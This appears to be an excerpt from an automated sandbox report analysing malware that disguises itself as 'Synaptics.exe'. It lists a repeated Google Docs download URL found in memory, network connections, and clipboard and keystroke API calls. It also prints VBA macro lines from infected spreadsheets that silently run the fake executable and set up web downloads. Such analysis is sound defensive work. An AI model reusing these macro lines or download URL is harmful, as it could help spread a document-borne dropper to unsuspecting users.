                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorc
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadort=d
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou4
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2651567161.000000000C0FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2651115505.000000000BD3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp.c
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpsP
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqB
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrC
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadri
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrigin
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.goo
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsG
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst#
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtent=
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu2
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu9.O
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007B7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_007B7099
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007B7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_007B7294
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_00497294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_00497294
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007A4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_007A4342
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_007CF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_004AF5D0

                              System Summary

                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: XJVR1Oh1.xlsm.3.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NVWZAPQSQL.xlsm.3.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: XJVR1Oh1.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: NVWZAPQSQL.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: XJVR1Oh1.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: NVWZAPQSQL.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: XJVR1Oh1.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: NVWZAPQSQL.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Windows\SysWOW64\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Windows\SysWOW64\wscript.exe, COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                              Source: C:\Windows\SysWOW64\wscript.exe, COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007629C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_007629C2
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007D02AA NtdllDialogWndProc_W,2_2_007D02AA
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CE769 NtdllDialogWndProc_W,CallWindowProcW,2_2_007CE769
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CEA4E NtdllDialogWndProc_W,2_2_007CEA4E
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_007CEAA6
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_007CECBC
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_0077AC99 NtdllDialogWndProc_W,2_2_0077AC99
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_0077AD5C NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,2_2_0077AD5C
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_0077AFB4 GetParent,NtdllDialogWndProc_W,2_2_0077AFB4
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_007CEFA8
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF0A1 SendMessageW,NtdllDialogWndProc_W,2_2_007CF0A1
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_007CF122
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF37C NtdllDialogWndProc_W,2_2_007CF37C
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF3DA NtdllDialogWndProc_W,2_2_007CF3DA
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF3AB NtdllDialogWndProc_W,2_2_007CF3AB
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF45A ClientToScreen,NtdllDialogWndProc_W,2_2_007CF45A
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF425 NtdllDialogWndProc_W,2_2_007CF425
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_007CF5D0
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CF594 GetWindowLongW,NtdllDialogWndProc_W,2_2_007CF594
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_0077B7F2 NtdllDialogWndProc_W,2_2_0077B7F2
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_0077B845 NtdllDialogWndProc_W,2_2_0077B845
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CFE80 NtdllDialogWndProc_W,2_2_007CFE80
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_007CFF04
                              Source: C:\Users\user\Desktop\._cache_222.exe, Code function: 2_2_007CFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_007CFF91
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004429C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_004429C2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004B02AA NtdllDialogWndProc_W,9_2_004B02AA
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AE769 NtdllDialogWndProc_W,CallWindowProcW,9_2_004AE769
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AEA4E NtdllDialogWndProc_W,9_2_004AEA4E
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,9_2_004AEAA6
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_0045AC99 NtdllDialogWndProc_W,9_2_0045AC99
